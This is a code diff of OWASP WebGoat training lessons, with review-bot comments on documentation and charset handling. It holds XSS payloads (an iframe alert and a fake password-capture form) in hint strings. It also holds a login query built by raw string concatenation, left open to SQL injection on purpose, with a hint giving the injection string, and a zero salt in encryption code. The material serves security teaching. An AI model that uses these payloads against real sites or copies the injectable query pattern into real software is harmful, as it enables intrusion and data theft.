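Review bot: The Javadoc `Gets the hints attribute of the HelloScreen object` on `getHints` names the wrong class (copied from another lesson), and the same `HelloScreen` wording recurs on the comment block before `DEFAULT_RANKING` and on `getTitle` in the next hunk. Suggested replacement for `getHints`: `Returns the per-stage hints shown to the user for this DOM XSS lesson.` with `@param s the current WebSession` and `@return the hint strings, in display order`. The block `Gets the ranking attribute ...` in the next hunk sits above the `DEFAULT_RANKING` field rather than above `getDefaultRanking()`, so it documents the wrong member and should move down. `getHints`'s body continues into the next hunk.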
@@ -161,106 +185,119 @@ public class DOMXSS extends SequentialLessonAdapter { hints.add("Try entering the following: " + "<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>"); - hints.add("Try entering the following: " + "Please enter your password:<BR><input type = \"password\" name=\"pass\"/><button " + - "onClick=\"javascript:alert('I have your password: ' + pass.value);\">Submit</button><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR>"); + hints + .add("Try entering the following: " + + "Please enter your password:<BR><input type = \"password\" name=\"pass\"/><button " + + "onClick=\"javascript:alert('I have your password: ' + pass.value);\">Submit</button><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR>"); + // Attack Strings: + // - //Attack Strings: + // - // - - // - - // - - //Please enter your password:
















+ // + // Please enter your password:
















return hints; } /** - * Gets the ranking attribute of the HelloScreen object - * - * @return The ranking value + * Gets the ranking attribute of the HelloScreen object + * + * @return The ranking value */ private final static Integer DEFAULT_RANKING = new Integer(10); - protected Integer getDefaultRanking() { + protected Integer getDefaultRanking() + { return DEFAULT_RANKING; } - protected Category getDefaultCategory() { + protected Category getDefaultCategory() + { return Category.AJAX_SECURITY; } /** - * Gets the title attribute of the HelloScreen object - * - * @return The title value + * Gets the title attribute of the HelloScreen object + * + * @return The title value */ - public String getTitle() { + public String getTitle() + { return ("LAB: DOM-Based cross-site scripting"); } - public String getInstructions(WebSession s) { + public String getInstructions(WebSession s) + { String instructions = ""; - if (getLessonTracker(s).getStage() == 1) { + if (getLessonTracker(s).getStage() == 1) + { instructions = "STAGE 1:\tFor this exercise, your mission is to deface this website using the image at the following location: OWASP IMAGE"; - } else if (getLessonTracker(s).getStage() == 2) { + } + else if (getLessonTracker(s).getStage() == 2) + { instructions = "STAGE 2:\tNow, try to create a JavaScript alert using the image tag"; - } else if (getLessonTracker(s).getStage() == 3) { + } + else if (getLessonTracker(s).getStage() == 3) + { instructions = "STAGE 3:\tNext, try to create a JavaScript alert using the IFRAME tag."; - } else if (getLessonTracker(s).getStage() == 4) { - instructions = "STAGE 4:\tUse the following to create a fake login form:

" + "Please enter your password:<BR><input type = \"password\" name=\"pass\"/><button " + - "onClick=\"javascript:alert('I have your password: ' + pass.value);\">Submit</button><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR>"; - } else if(getLessonTracker(s).getStage() == 5) { + } + else if (getLessonTracker(s).getStage() == 4) + { + instructions = "STAGE 4:\tUse the following to create a fake login form:

" + + "Please enter your password:<BR><input type = \"password\" name=\"pass\"/><button " + + "onClick=\"javascript:alert('I have your password: ' + pass.value);\">Submit</button><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR>"; + } + else if (getLessonTracker(s).getStage() == 5) + { instructions = "STAGE 5:\tPerform client-side HTML entity encoding to mitigate the DOM XSS vulnerability. A utility method is provided for you in WebContent/javascript/escape.js."; } return (instructions); } - private String getFileContent(String content) - { - BufferedReader is = null; - StringBuffer sb = new StringBuffer(); + private String getFileContent(String content) + { + BufferedReader is = null; + StringBuffer sb = new StringBuffer(); - try - { - is = new BufferedReader(new FileReader(new File(content))); - String s = null; + try + { + is = new BufferedReader(new FileReader(new File(content))); + String s = null; - while((s = is.readLine()) != null) - { - sb.append(s); - } - } - catch (Exception e) - { - e.printStackTrace(); - } - finally - { - if(is != null) - { - try - { - is.close(); - } - catch (IOException ioe) - { + while ((s = is.readLine()) != null) + { + sb.append(s); + } + } catch (Exception e) + { + e.printStackTrace(); + } finally + { + if (is != null) + { + try + { + is.close(); + } catch (IOException ioe) + { - } - } - } + } + } + } - return sb.toString(); - } + return sb.toString(); + } - public Element getCredits() - { - return super.getCustomCredits("", ASPECT_LOGO); - } + public Element getCredits() + { + return super.getCustomCredits("", ASPECT_LOGO); + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/DOS_Login.java b/main/project/JavaSource/org/owasp/webgoat/lessons/DOS_Login.java index 678b6ab1f..74f963276 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/DOS_Login.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/DOS_Login.java 
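Review bot: `getFileContent` still swallows the close failure with an empty `catch (IOException ioe) { }` and reduces every read error to `e.printStackTrace()`, so a missing or unreadable `DOMXSS.js` makes `doStage5` silently report the stage as unsolved; at minimum log the close failure, and consider letting the method propagate `IOException` since the caller already declares `throws Exception`. `new FileReader(new File(content))` decodes with the platform default charset; `new InputStreamReader(new FileInputStream(content), "UTF-8")` (with the matching `java.io` imports) makes the comparison independent of the server's locale. The parameter is named `content` although it holds a path — `path` would read better — and the method has no Javadoc; `Reads the given file and returns its lines concatenated without separators.` with `@param path file system path of the resource to read` documents the separator-dropping behaviour the caller depends on.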
@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat.lessons;
 import java.sql.Connection;
@@ -7,7 +8,6 @@ import java.sql.SQLException;
 import java.sql.Statement;
 import java.util.ArrayList;
 import java.util.List;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.StringElement;
@@ -18,111 +18,108 @@ import org.apache.ecs.html.P;
 import org.apache.ecs.html.TD;
 import org.apache.ecs.html.TR;
 import org.apache.ecs.html.Table;
-
 import org.owasp.webgoat.session.DatabaseUtilities;
 import org.owasp.webgoat.session.ECSFactory;
 import org.owasp.webgoat.session.WebSession;
 import org.owasp.webgoat.session.ParameterNotFoundException;
-/*******************************************************************************
+
+/***************************************************************************************************
 *
 *
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
 *
 * Copyright (c) 2002 - 2007 Bruce Mayhew
 *
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
 *
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
*
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
 *
 * Getting Source ==============
 *
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
 *
 * For details, please see http://code.google.com/p/webgoat/
- *
+ *
 * @author Bruce Mayhew WebGoat
 * @created October 28, 2003
 */
 public class DOS_Login extends LessonAdapter
 {
- /**
- * Description of the Field
- */
- protected final static String PASSWORD = "Password";
+ /**
+ * Description of the Field
+ */
+ protected final static String PASSWORD = "Password";
- /**
- * Description of the Field
- */
- protected final static String USERNAME = "Username";
+ /**
+ * Description of the Field
+ */
+ protected final static String USERNAME = "Username";
- /**
- * Description of the Method
- *
- * @param s Description of the Parameter
- * @return Description of the Return Value
- */
- protected Element createContent(WebSession s)
- {
+ /**
+ * Description of the Method
+ *
+ * @param s
+ * Description of the Parameter
+ * @return Description of the Return Value
+ */
+ protected Element createContent(WebSession s)
+ {
 ElementContainer ec = new ElementContainer();
-
+
 try
 {
- String username = "";
- String password = "";
- username = s.getParser().getRawParameter(USERNAME);
- password = s.getParser().getRawParameter(PASSWORD);
-
- // don;t allow user name from other lessons. it would be too simple.
- if (username.equals("jeff") || username.equals("dave"))
- {
+ String username = "";
+ String password = "";
+ username = s.getParser().getRawParameter(USERNAME);
+ password = s.getParser().getRawParameter(PASSWORD);
+
+ // don;t allow user name from other lessons. it would be too simple.
+ if (username.equals("jeff") || username.equals("dave"))
+ {
 ec.addElement(new H2("Login Failed: 'jeff' and 'dave' are not valid for this lesson"));
 return (ec.addElement(makeLogin(s)));
- }
-
- // Check if the login is valid
- Connection connection = DatabaseUtilities.getConnection(s);
-
- String query = "SELECT * FROM user_system_data WHERE user_name = '"
- + username + "' and password = '" + password + "'";
- ec.addElement(new StringElement(query));
-
- try
- {
- Statement statement = connection.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,ResultSet.CONCUR_READ_ONLY);
+ }
+
+ // Check if the login is valid
+ Connection connection = DatabaseUtilities.getConnection(s);
+
+ String query = "SELECT * FROM user_system_data WHERE user_name = '" + username + "' and password = '" + + password + "'";
+ ec.addElement(new StringElement(query));
+
+ try
+ {
+ Statement statement = connection.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
+ ResultSet.CONCUR_READ_ONLY);
 ResultSet results = statement.executeQuery(query);
-
+
 if ((results != null) && (results.first() == true))
 {
- ResultSetMetaData resultsMetaData = results.getMetaData();
- ec.addElement(DatabaseUtilities.writeTable(results,resultsMetaData));
- results.last();
-
- // If they get back more than one user they succeeded
- if (results.getRow() >= 1)
- {
+ ResultSetMetaData resultsMetaData = results.getMetaData();
+ ec.addElement(DatabaseUtilities.writeTable(results, resultsMetaData));
+ results.last();
+
+ // If they get back more than one user they succeeded
+ if (results.getRow() >= 1)
+ {
 // Make sure this isn't data from an sql injected query.
if (results.getString(2).equals(username) && results.getString(3).equals(password))
 {
- String insertData1 = "INSERT INTO user_login VALUES ( '"
- + username
- + "', '"
- + s.getUserName()
- + "' )";
- statement.executeUpdate(insertData1);
+ String insertData1 = "INSERT INTO user_login VALUES ( '" + username + "', '" + + s.getUserName() + "' )";
+ statement.executeUpdate(insertData1);
 }
 // check the total count of logins
 query = "SELECT * FROM user_login WHERE webgoat_user = '" + s.getUserName() + "'";
@@ -131,134 +128,125 @@ public class DOS_Login extends LessonAdapter
 // If they get back more than one user they succeeded
 if (results.getRow() >= 3)
 {
- makeSuccess(s);
- String deleteData1 = "DELETE from user_login WHERE webgoat_user = '" + s.getUserName() + "'";
- statement.executeUpdate(deleteData1);
- return (new H1("Congratulations! Lesson Completed"));
+ makeSuccess(s);
+ String deleteData1 = "DELETE from user_login WHERE webgoat_user = '" + s.getUserName() + + "'";
+ statement.executeUpdate(deleteData1);
+ return (new H1("Congratulations! Lesson Completed"));
 }
-
+
 ec.addElement(new H2("Login Succeeded: Total login count: " + results.getRow()));
- }
+ }
 }
 else
 {
- ec.addElement(new H2("Login Failed"));
- // check the total count of logins
- query = "SELECT * FROM user_login WHERE webgoat_user = '"
- + s.getUserName() + "'";
- results = statement.executeQuery(query);
- results.last();
- ec.addElement(new H2("Successfull login count: "
- + results.getRow()));
-
+ ec.addElement(new H2("Login Failed"));
+ // check the total count of logins
+ query = "SELECT * FROM user_login WHERE webgoat_user = '" + s.getUserName() + "'";
+ results = statement.executeQuery(query);
+ results.last();
+ ec.addElement(new H2("Successfull login count: " + results.getRow()));
+
 }
- }
- catch (SQLException sqle)
- {
+ } catch (SQLException sqle)
+ {
 ec.addElement(new P().addElement(sqle.getMessage()));
 sqle.printStackTrace();
- }
- }
- catch (ParameterNotFoundException pnfe)
+ }
+ } catch (ParameterNotFoundException pnfe)
 {
 /**
- * Catching this exception prevents the "Error generating org.owasp.webgoat.lesson.DOS_Login"
- * message from being displayed on first load. Note that if we are missing a parameter in
- * the request, we do not want to continue processing and we simply want to display the
- * default login page.
+ * Catching this exception prevents the "Error generating
+ * org.owasp.webgoat.lesson.DOS_Login" message from being displayed on first load.
Note
+ * that if we are missing a parameter in the request, we do not want to continue
+ * processing and we simply want to display the default login page.
 */
- }
- catch (Exception e)
+ } catch (Exception e)
 {
 s.setMessage("Error generating " + this.getClass().getName());
 }
-
+
 return (ec.addElement(makeLogin(s)));
- }
-
- /**
- * Gets the category attribute of the WeakAuthenticationCookie object
- *
- * @return The category value
- */
- protected Category getDefaultCategory()
- {
- return Category.DOS;
- }
-
- /**
- * Gets the hints attribute of the CookieScreen object
- *
- * @return The hints value
- */
- protected List getHints(WebSession s)
- {
- List hints = new ArrayList();
- hints.add("Use a SQL Injection to obtain the user names. ");
- hints
- .add("Try to generate this query: SELECT * FROM user_system_data WHERE user_name = 'goober' and password = 'dont_care' or '1' = '1'");
- hints
- .add("Try &quot;dont_care' or '1' = '1&quot; in the password field");
- return hints;
- }
-
- private final static Integer DEFAULT_RANKING = new Integer(90);
-
- protected Integer getDefaultRanking()
- {
- return DEFAULT_RANKING;
- }
-
- /**
- * Gets the title attribute of the CookieScreen object
- *
- * @return The title value
- */
- public String getTitle()
- {
- return ("Denial of Service from Multiple Logins");
- }
-
- /**
- * Description of the Method
- *
- * @param s Description of the Parameter
- * @return Description of the Return Value
- */
- protected Element makeLogin(WebSession s)
- {
- ElementContainer ec = new ElementContainer();
-
- // add the login fields
- Table t = new Table(0).setCellSpacing(0).setCellPadding(0).setBorder(0);
-
- if (s.isColor())
- {
- t.setBorder(1);
 }
- TR row1 = new TR();
- TR row2 = new TR();
- row1.addElement(new TD(new StringElement("User Name: ")));
- row2.addElement(new TD(new StringElement("Password: ")));
+ /**
+ * Gets the category attribute of the WeakAuthenticationCookie object
+ *
+ * @return The category value
+ */
+
protected Category getDefaultCategory()
+ {
+ return Category.DOS;
+ }
- Input input1 = new Input(Input.TEXT, USERNAME, "");
- Input input2 = new Input(Input.PASSWORD, PASSWORD, "");
- row1.addElement(new TD(input1));
- row2.addElement(new TD(input2));
- t.addElement(row1);
- t.addElement(row2);
+ /**
+ * Gets the hints attribute of the CookieScreen object
+ *
+ * @return The hints value
+ */
+ protected List getHints(WebSession s)
+ {
+ List hints = new ArrayList();
+ hints.add("Use a SQL Injection to obtain the user names. ");
+ hints
+ .add("Try to generate this query: SELECT * FROM user_system_data WHERE user_name = 'goober' and password = 'dont_care' or '1' = '1'");
+ hints.add("Try &quot;dont_care' or '1' = '1&quot; in the password field");
+ return hints;
+ }
- Element b = ECSFactory.makeButton("Login");
- t.addElement(new TR(new TD(b)));
- ec.addElement(t);
+ private final static Integer DEFAULT_RANKING = new Integer(90);
- return (ec);
- }
+ protected Integer getDefaultRanking()
+ {
+ return DEFAULT_RANKING;
+ }
+
+ /**
+ * Gets the title attribute of the CookieScreen object
+ *
+ * @return The title value
+ */
+ public String getTitle()
+ {
+ return ("Denial of Service from Multiple Logins");
+ }
+
+ /**
+ * Description of the Method
+ *
+ * @param s
+ * Description of the Parameter
+ * @return Description of the Return Value
+ */
+ protected Element makeLogin(WebSession s)
+ {
+ ElementContainer ec = new ElementContainer();
+
+ // add the login fields
+ Table t = new Table(0).setCellSpacing(0).setCellPadding(0).setBorder(0);
+
+ if (s.isColor())
+ {
+ t.setBorder(1);
+ }
+
+ TR row1 = new TR();
+ TR row2 = new TR();
+ row1.addElement(new TD(new StringElement("User Name: ")));
+ row2.addElement(new TD(new StringElement("Password: ")));
+
+ Input input1 = new Input(Input.TEXT, USERNAME, "");
+ Input input2 = new Input(Input.PASSWORD, PASSWORD, "");
+ row1.addElement(new TD(input1));
+ row2.addElement(new TD(input2));
+ t.addElement(row1);
+ t.addElement(row2);
+
+
Element b = ECSFactory.makeButton("Login");
+ t.addElement(new TR(new TD(b)));
+ ec.addElement(t);
+
+ return (ec);
+ }
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/DangerousEval.java b/main/project/JavaSource/org/owasp/webgoat/lessons/DangerousEval.java
index 794171bee..0a7f3cd7b 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/DangerousEval.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/DangerousEval.java
@@ -1,9 +1,9 @@
+
 package org.owasp.webgoat.lessons;
 import java.util.ArrayList;
 import java.util.List;
 import java.util.regex.Pattern;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.html.A;
@@ -20,261 +20,275 @@ import org.apache.ecs.html.Table;
 import org.owasp.webgoat.session.WebSession;
 import org.owasp.webgoat.util.HtmlEncoder;
-/*******************************************************************************
+
+/***************************************************************************************************
 *
 *
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
 *
 * Copyright (c) 2002 - 2007 Bruce Mayhew
 *
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
 *
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
 *
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
 *
 * Getting Source ==============
 *
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
 *
 * For details, please see http://code.google.com/p/webgoat/
- *
- * @author Eric Sheridan, Aspect Security
- * @created October 28, 2003
+ *
+ * @author Eric Sheridan, Aspect Security
+ * @created October 28, 2003
 */
 public class DangerousEval extends LessonAdapter
 {
- public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0));
-
- public final static String PASSED = "__DANGEROUS_EVAL_PASS";
-
- /**
- * Description of the Method
- *
- * @param s Description of the Parameter
- * @return Description of the Return Value
- */
+ public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com")
+ .addElement(
+ new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0)
+ .setVspace(0));
- protected Element createContent(WebSession s)
- {
+ public final static String PASSED = "__DANGEROUS_EVAL_PASS";
+
+ /**
+ * Description of the Method
+ *
+ * @param s
+ * Description of the Parameter
+ * @return Description of the Return Value
+ */
+
+ protected Element createContent(WebSession s)
+ {
 ElementContainer ec = new ElementContainer();
 String regex1 = "^[0-9]{3}$";// any three digits
 Pattern pattern1 = Pattern.compile(regex1);
-
+
 try
 {
 checkSuccess(s);
-
+
 String param1 = s.getParser().getRawParameter("field1", "111");
- //String param2 = HtmlEncoder.encode(s.getParser().getRawParameter("field2", "4128 3214 0002 1999"));
- float
quantity = 1.0f;
- float total = 0.0f;
- float runningTotal = 0.0f;
-
- // FIXME: encode output of field2, then s.setMessage( field2 );
- ec.addElement("
- /**
- * Gets the instructions attribute of the WeakAccessControl object
- *
- * @return The instructions value
- */
- public String getInstructions(WebSession s)
- {
+ //
+ /**
+ * Gets the instructions attribute of the WeakAccessControl object
+ *
+ * @return The instructions value
+ */
+ public String getInstructions(WebSession s)
+ {
 String instructions = "For this exercise, your mission is to come up with some input containing a script. You have to try to get this page to reflect that input back to your browser, which will execute the script. In order to pass this lesson, you must 'alert()' document.cookie.";
 return (instructions);
- }
+ }
- private final static Integer DEFAULT_RANKING = new Integer(120);
+ private final static Integer DEFAULT_RANKING = new Integer(120);
- protected Integer getDefaultRanking()
- {
- return DEFAULT_RANKING;
- }
+ protected Integer getDefaultRanking()
+ {
+ return DEFAULT_RANKING;
+ }
+ /**
+ * Gets the title attribute of the AccessControlScreen object
+ *
+ * @return The title value
+ */
+ public String getTitle()
+ {
+ return "Dangerous Use of Eval";
+ }
- /**
- * Gets the title attribute of the AccessControlScreen object
- *
- * @return The title value
- */
- public String getTitle()
- {
- return "Dangerous Use of Eval";
- }
-
- public Element getCredits()
- {
- return super.getCustomCredits("", ASPECT_LOGO);
- }
-
- /**
- * Check to see if JSP says they passed the lesson.
- * @param s
- */
- private void checkSuccess(WebSession s)
- {
- javax.servlet.http.HttpSession session = s.getRequest().getSession();
-
- if(session.getAttribute(PASSED) != null)
+ public Element getCredits()
+ {
+ return super.getCustomCredits("", ASPECT_LOGO);
+ }
+
+ /**
+ * Check to see if JSP says they passed the lesson.
+ *
+ * @param s
+ */
+ private void checkSuccess(WebSession s)
+ {
+ javax.servlet.http.HttpSession session = s.getRequest().getSession();
+
+ if (session.getAttribute(PASSED) != null)
 {
 makeSuccess(s);
-
+
 session.removeAttribute(PASSED);
 }
- }
+ }
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/Encoding.java b/main/project/JavaSource/org/owasp/webgoat/lessons/Encoding.java
index 8b9d98411..887dfa0eb 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/Encoding.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/Encoding.java
@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat.lessons;
 import java.io.IOException;
@@ -12,12 +13,10 @@ import java.security.MessageDigest;
 import java.security.NoSuchAlgorithmException;
 import java.util.ArrayList;
 import java.util.List;
-
 import javax.crypto.Cipher;
 import javax.crypto.SecretKey;
 import javax.crypto.SecretKeyFactory;
 import javax.crypto.spec.PBEParameterSpec;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.html.A;
@@ -33,43 +32,44 @@ import org.owasp.webgoat.session.WebSession;
 import org.owasp.webgoat.util.HtmlEncoder;
-/*******************************************************************************
+/***************************************************************************************************
 *
 *
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
 *
 * Copyright (c) 2002 - 2007 Bruce Mayhew
 *
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
 *
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
 *
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
 *
 * Getting Source ==============
 *
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
 *
 * For details, please see http://code.google.com/p/webgoat/
- *
- * @author Jeff Williams Aspect Security
- * @created October 28, 2003
+ *
+ * @author Jeff Williams Aspect Security
+ * @created October 28, 2003
 */
 public class Encoding extends LessonAdapter
 {
- public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0));
-
+ public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com")
+ .addElement(
+ new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0)
+ .setVspace(0));
+
 private final static String INPUT = "input";
 private final static String KEY = "key";
@@ -82,103 +82,96 @@ public class Encoding extends LessonAdapter
 // encryption constant
- private static byte[] salt =
- {
- (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00,
- (byte) 0x00
- };
-
-
+ private static byte[] salt = { (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x00,
+ (byte) 0x00, (byte) 0x00 };
 /**
- * Returns the base 64 decoding of a string.
- *
- * @param str Description of the Parameter
- * @return Description of the Return Value
- * @exception IOException Description of the Exception
+ * Returns the base 64 decoding of a string.
+ *
+ * @param str
+ * Description of the Parameter
+ * @return Description of the Return Value
+ * @exception IOException
+ * Description of the Exception
 */
- public static String base64Decode( String str ) throws IOException
+ public static String base64Decode(String str) throws IOException
 {
- byte[] b = decoder.decodeBuffer( str );
+ byte[] b = decoder.decodeBuffer(str);
- return ( new String( b ) );
+ return (new String(b));
 }
-
-
 /**
- * Description of the Method
- *
- * @param c Description of the Parameter
- * @return Description of the Return Value
- * @exception IOException Description of the Exception
+ * Description of the Method
+ *
+ * @param c
+ * Description of the Parameter
+ * @return Description of the Return Value
+ * @exception IOException
+ * Description of the Exception
 */
- public static String base64Decode( char[] c ) throws IOException
+ public static String base64Decode(char[] c) throws IOException
 {
- return base64Decode( new String( c ) );
+ return base64Decode(new String(c));
 }
-
-
 /**
- * Description of the Method
- *
- * @param c Description of the Parameter
- * @return Description of the Return Value
+ * Description of the Method
+ *
+ * @param c
+ * Description of the Parameter
+ * @return Description of the Return Value
 */
- public static String base64Encode( char[] c )
+ public static String base64Encode(char[] c)
 {
- return base64Encode( new String( c ) );
+ return base64Encode(new String(c));
 }
-
-
 /**
- * Returns the base 64 encoding of a string.
- *
- * @param str Description of the Parameter
- * @return Description of the Return Value
+ * Returns the base 64 encoding of a string.
+ *
+ * @param str
+ * Description of the Parameter
+ * @return Description of the Return Value
 */
- public static String base64Encode( String str )
+ public static String base64Encode(String str)
 {
 byte[] b = str.getBytes();
- return ( encoder.encode( b ) );
+ return (encoder.encode(b));
 }
-
-
 /**
- * Description of the Method
- *
- * @param b Description of the Parameter
- * @return Description of the Return Value
+ * Description of the Method
+ *
+ * @param b
+ * Description of the Parameter
+ * @return Description of the Return Value
 */
- public static String base64Encode( byte[] b )
+ public static String base64Encode(byte[] b)
 {
- return ( encoder.encode( b ) );
+ return (encoder.encode(b));
 }
-
-
 /**
- * Description of the Method
- *
- * @param s Description of the Parameter
- * @return Description of the Return Value
+ * Description of the Method
+ *
+ * @param s
+ * Description of the Parameter
+ * @return Description of the Return Value
 */
- protected Element createContent( WebSession s )
+ protected Element createContent(WebSession s)
 {
 ElementContainer ec = new ElementContainer();
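Review bot: base64Encode(String) and base64Decode(String) in this hunk convert between text and bytes with the platform default charset (`byte[] b = str.getBytes();` and `return (new String(b));`), whereas decryptString and encryptString further down the file spell out "UTF-8" (`new String(utf8, "UTF-8")`, `str.getBytes("UTF-8")`), so the Base64 row of the lesson table changes with the JVM's default encoding while the PBE row does not. Using the same explicit form here, `byte[] b = str.getBytes("UTF-8");` and `return (new String(b, "UTF-8"));`, makes the two rows consistent; base64Encode(String) declares no exception, so the checked UnsupportedEncodingException has to be caught there or the charset passed as a Charset object if the project targets a JDK that has it. The reformatted `salt` field at the top of the hunk is an all-zero constant, which is fine for a lesson that only displays the ciphertext, but a comment such as `// demo-only fixed salt; real PBE uses a random, per-secret salt` would keep it from being copied as a pattern.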
@@ -186,221 +179,220 @@ public class Encoding extends LessonAdapter
 try
 {
- String userInput = s.getParser().getRawParameter( INPUT, "" );
+ String userInput = s.getParser().getRawParameter(INPUT, "");
- String userKey = s.getParser().getStringParameter( KEY, "" );
+ String userKey = s.getParser().getStringParameter(KEY, "");
 Table table = new Table();
 TR tr = new TR();
- tr.addElement( new TD( "Enter a string: " ) );
+ tr.addElement(new TD("Enter a string: "));
- Input input = new Input( Input.TEXT, INPUT, userInput );
+ Input input = new Input(Input.TEXT, INPUT, userInput);
- tr.addElement( new TD().addElement( input ) );
+ tr.addElement(new TD().addElement(input));
- table.addElement( tr );
+ table.addElement(tr);
 tr = new TR();
- tr.addElement( new TD( "Enter a password (optional): " ) );
+ tr.addElement(new TD("Enter a password (optional): "));
- Input key = new Input( Input.TEXT, KEY, userKey );
+ Input key = new Input(Input.TEXT, KEY, userKey);
- tr.addElement( new TD().addElement( key ) );
+ tr.addElement(new TD().addElement(key));
- table.addElement( tr );
+ table.addElement(tr);
 tr = new TR();
- Element b = ECSFactory.makeButton( "Go!" );
+ Element b = ECSFactory.makeButton("Go!");
- tr.addElement( new TD().setAlign( "center" ).setColSpan( 2 ).addElement( b ) );
+ tr.addElement(new TD().setAlign("center").setColSpan(2).addElement(b));
- table.addElement( tr );
+ table.addElement(tr);
- ec.addElement( table );
+ ec.addElement(table);
- ec.addElement( new P() );
+ ec.addElement(new P());
 Table t = new Table();
- t.setWidth( "100%" );
+ t.setWidth("100%");
